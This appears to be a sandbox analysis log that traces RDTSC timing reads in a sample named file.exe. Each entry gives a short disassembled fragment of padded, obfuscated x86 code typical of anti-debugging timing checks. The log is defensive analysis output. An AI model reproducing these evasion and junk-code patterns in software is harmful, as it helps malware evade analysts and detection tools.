Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540980 second address: 75409CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, B8h 0x00000005 pushfd 0x00000006 jmp 00007FC69CFD56F0h 0x0000000b and ah, FFFFFF88h 0x0000000e jmp 00007FC69CFD56EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+1Ch] 0x0000001a pushad 0x0000001b push esi 0x0000001c mov di, 98F6h 0x00000020 pop ebx 0x00000021 mov di, ax 0x00000024 popad 0x00000025 mov dword ptr [esi+3Ch], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CFD56F0h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75409CD second address: 75409DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75409DC second address: 7540A32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC69CFD56ECh 0x00000013 sub cx, 0BA8h 0x00000018 jmp 00007FC69CFD56EBh 0x0000001d popfd 0x0000001e movzx ecx, bx 0x00000021 popad 0x00000022 mov dword ptr [esi+40h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC69CFD56EEh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540A32 second address: 7540A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC69D5338FBh 0x00000016 add ah, 0000004Eh 0x00000019 jmp 00007FC69D533909h 0x0000001e popfd 0x0000001f popad 0x00000020 push 00000001h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC69D5338FDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540A83 second address: 7540B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC69CFD56EEh 0x0000000f push eax 0x00000010 jmp 00007FC69CFD56EBh 0x00000015 nop 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FC69CFD56F4h 0x0000001d jmp 00007FC69CFD56F5h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FC69CFD56F0h 0x00000029 and ecx, 6A6509E8h 0x0000002f jmp 00007FC69CFD56EBh 0x00000034 popfd 0x00000035 popad 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 jmp 00007FC69CFD56F6h 0x0000003e nop 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC69CFD56EEh 0x00000046 sub esi, 5B82A778h 0x0000004c jmp 00007FC69CFD56EBh 0x00000051 popfd 0x00000052 push esi 0x00000053 mov si, bx 0x00000056 pop ebx 0x00000057 popad 0x00000058 push eax 0x00000059 jmp 00007FC69CFD56F1h 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FC69CFD56EDh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540BF8 second address: 7540C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540C15 second address: 7540CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c jmp 00007FC69CFD56EEh 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 jmp 00007FC69CFD56F0h 0x00000019 lea eax, dword ptr [ebx+78h] 0x0000001c jmp 00007FC69CFD56F0h 0x00000021 push 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC69CFD56EDh 0x0000002c or si, 5316h 0x00000031 jmp 00007FC69CFD56F1h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FC69CFD56F0h 0x0000003d sbb si, 9F38h 0x00000042 jmp 00007FC69CFD56EBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540CAE second address: 7540CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540CB4 second address: 7540CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CFD56F3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540CD2 second address: 7540D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FC69D5338FEh 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 pushad 0x00000015 call 00007FC69D5338FEh 0x0000001a mov esi, 58D7EBB1h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FC69D533907h 0x00000026 or esi, 52E7651Eh 0x0000002c jmp 00007FC69D533909h 0x00000031 popfd 0x00000032 popad 0x00000033 nop 0x00000034 pushad 0x00000035 mov di, cx 0x00000038 mov bx, cx 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007FC69D533905h 0x00000042 nop 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FC69D5338FCh 0x0000004a add ch, 00000078h 0x0000004d jmp 00007FC69D5338FBh 0x00000052 popfd 0x00000053 push eax 0x00000054 push edx 0x00000055 mov ebx, eax 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540DFD second address: 7540E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E03 second address: 7540E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E07 second address: 7540E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E0B second address: 7540E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ax, 55E3h 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007FC69D533909h 0x00000017 jmp 00007FC69D5338FBh 0x0000001c popfd 0x0000001d popad 0x0000001e js 00007FC70ADF216Ch 0x00000024 jmp 00007FC69D533906h 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movsx edx, ax 0x00000032 mov dx, cx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E6C second address: 7540E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 jmp 00007FC69CFD56EDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+08h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E8A second address: 7540E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540E9D second address: 7540F11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC69CFD56EBh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebx+70h] 0x0000000f jmp 00007FC69CFD56EFh 0x00000014 push 00000001h 0x00000016 pushad 0x00000017 mov di, si 0x0000001a pushfd 0x0000001b jmp 00007FC69CFD56F0h 0x00000020 or cl, FFFFFFD8h 0x00000023 jmp 00007FC69CFD56EBh 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007FC69CFD56F2h 0x00000034 xor esi, 5CE5C538h 0x0000003a jmp 00007FC69CFD56EBh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540F11 second address: 7540F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, si 0x0000000e popad 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop edx 0x00000015 pushfd 0x00000016 jmp 00007FC69D5338FCh 0x0000001b jmp 00007FC69D533905h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540F4A second address: 7540F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d mov ecx, 3DA7A0C3h 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 push esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC69CFD56F7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540FCC second address: 7541029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FC69D5338FEh 0x00000010 test edi, edi 0x00000012 jmp 00007FC69D533900h 0x00000017 js 00007FC70ADF1F9Ah 0x0000001d jmp 00007FC69D533900h 0x00000022 mov eax, dword ptr [ebp-14h] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541029 second address: 754102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754102D second address: 7541031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541031 second address: 7541040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541040 second address: 7541044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541044 second address: 7541052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541052 second address: 7541064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69D5338FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541064 second address: 75410A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007FC69CFD56F7h 0x00000010 mov edx, 74E806ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC69CFD56F5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75410A2 second address: 75410AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75410AA second address: 7541134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, 00000000h 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 mov edx, 6D6644CCh 0x00000018 popad 0x00000019 popad 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e pushad 0x0000001f mov ecx, edi 0x00000021 jmp 00007FC69CFD56EDh 0x00000026 popad 0x00000027 pop edi 0x00000028 jmp 00007FC69CFD56EEh 0x0000002d test eax, eax 0x0000002f pushad 0x00000030 movzx esi, di 0x00000033 pushfd 0x00000034 jmp 00007FC69CFD56F3h 0x00000039 jmp 00007FC69CFD56F3h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007FC70A893CABh 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FC69CFD56F5h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541134 second address: 754113A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754113A second address: 75411E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c call 00007FC69CFD56F5h 0x00000011 pop ebx 0x00000012 pushfd 0x00000013 jmp 00007FC69CFD56ECh 0x00000018 adc esi, 67A09268h 0x0000001e jmp 00007FC69CFD56EBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [esi] 0x00000027 jmp 00007FC69CFD56F6h 0x0000002c mov dword ptr [edx], eax 0x0000002e pushad 0x0000002f mov edi, esi 0x00000031 pushfd 0x00000032 jmp 00007FC69CFD56EAh 0x00000037 sbb ah, FFFFFFF8h 0x0000003a jmp 00007FC69CFD56EBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr [esi+04h] 0x00000044 jmp 00007FC69CFD56F6h 0x00000049 mov dword ptr [edx+04h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC69CFD56F7h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75411E9 second address: 75411EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75411EF second address: 7541272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69CFD56EDh 0x00000012 adc eax, 4F5BF8A6h 0x00000018 jmp 00007FC69CFD56F1h 0x0000001d popfd 0x0000001e movzx eax, dx 0x00000021 popad 0x00000022 mov dword ptr [edx+08h], eax 0x00000025 pushad 0x00000026 movsx edx, ax 0x00000029 pushfd 0x0000002a jmp 00007FC69CFD56F2h 0x0000002f sbb al, 00000078h 0x00000032 jmp 00007FC69CFD56EBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov eax, dword ptr [esi+0Ch] 0x0000003c jmp 00007FC69CFD56F6h 0x00000041 mov dword ptr [edx+0Ch], eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 movsx edi, si 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541272 second address: 7541291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533902h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541291 second address: 7541295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541295 second address: 754129B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754129B second address: 75412DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007FC69CFD56F0h 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 call 00007FC69CFD56EDh 0x0000001c pop esi 0x0000001d mov ch, bh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75412DD second address: 7541325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FC69D533902h 0x0000000c add eax, 3EB1FD58h 0x00000012 jmp 00007FC69D5338FBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [edx+14h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC69D533905h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541325 second address: 754134C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC69CFD56EDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754134C second address: 7541352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541352 second address: 7541356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541356 second address: 7541375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69D533902h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541375 second address: 75413F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CFD56F1h 0x00000009 and ecx, 2A9C4666h 0x0000000f jmp 00007FC69CFD56F1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+1Ch] 0x0000001b pushad 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 push edi 0x00000021 mov edx, ecx 0x00000023 pop esi 0x00000024 popad 0x00000025 mov dword ptr [edx+1Ch], eax 0x00000028 jmp 00007FC69CFD56F3h 0x0000002d mov eax, dword ptr [esi+20h] 0x00000030 jmp 00007FC69CFD56F6h 0x00000035 mov dword ptr [edx+20h], eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b call 00007FC69CFD56ECh 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75413F4 second address: 754142F instructions: 0x00000000 rdtsc 0x00000002 call 00007FC69D5338FBh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, ebx 0x0000000c popad 0x0000000d mov eax, dword ptr [esi+24h] 0x00000010 jmp 00007FC69D5338FBh 0x00000015 mov dword ptr [edx+24h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC69D533905h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754142F second address: 7541435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541435 second address: 7541439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541439 second address: 754145B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+28h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754145B second address: 7541461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541461 second address: 754149C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A2EFh 0x00000007 mov si, 7F0Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+28h], eax 0x00000011 jmp 00007FC69CFD56EEh 0x00000016 mov ecx, dword ptr [esi+2Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC69CFD56F7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754149C second address: 75414A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75414A2 second address: 75414A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75414A6 second address: 75414D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b jmp 00007FC69D533907h 0x00000010 mov ax, word ptr [esi+30h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 movzx eax, dx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75414D2 second address: 7541524 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC69CFD56F8h 0x0000000d sub ch, 00000038h 0x00000010 jmp 00007FC69CFD56EBh 0x00000015 popfd 0x00000016 popad 0x00000017 mov word ptr [edx+30h], ax 0x0000001b jmp 00007FC69CFD56F6h 0x00000020 mov ax, word ptr [esi+32h] 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541524 second address: 75415D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC69D5338FAh 0x0000000a sub ecx, 70B75DC8h 0x00000010 jmp 00007FC69D5338FBh 0x00000015 popfd 0x00000016 popad 0x00000017 call 00007FC69D533908h 0x0000001c push esi 0x0000001d pop edx 0x0000001e pop eax 0x0000001f popad 0x00000020 mov word ptr [edx+32h], ax 0x00000024 jmp 00007FC69D5338FDh 0x00000029 mov eax, dword ptr [esi+34h] 0x0000002c jmp 00007FC69D5338FEh 0x00000031 mov dword ptr [edx+34h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FC69D5338FDh 0x0000003d jmp 00007FC69D5338FBh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FC69D533908h 0x00000049 xor esi, 09E9E818h 0x0000004f jmp 00007FC69D5338FBh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415D0 second address: 75415D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415D6 second address: 75415DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415DA second address: 75415EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415EE second address: 75415F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415F2 second address: 75415F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75415F8 second address: 7541647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC70ADF1A06h 0x0000000f pushad 0x00000010 mov esi, 024DEDCBh 0x00000015 pushfd 0x00000016 jmp 00007FC69D533900h 0x0000001b jmp 00007FC69D533905h 0x00000020 popfd 0x00000021 popad 0x00000022 or dword ptr [edx+38h], FFFFFFFFh 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov ecx, 2BD9B1D9h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541647 second address: 75416CC instructions: 0x00000000 rdtsc 0x00000002 mov cl, 92h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC69CFD56EBh 0x0000000c sub ecx, 4102944Eh 0x00000012 jmp 00007FC69CFD56F9h 0x00000017 popfd 0x00000018 popad 0x00000019 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001d pushad 0x0000001e jmp 00007FC69CFD56ECh 0x00000023 pushfd 0x00000024 jmp 00007FC69CFD56F2h 0x00000029 adc esi, 075FDBF8h 0x0000002f jmp 00007FC69CFD56EBh 0x00000034 popfd 0x00000035 popad 0x00000036 or dword ptr [edx+40h], FFFFFFFFh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC69CFD56F5h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7570076 second address: 757007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 757007A second address: 7570080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
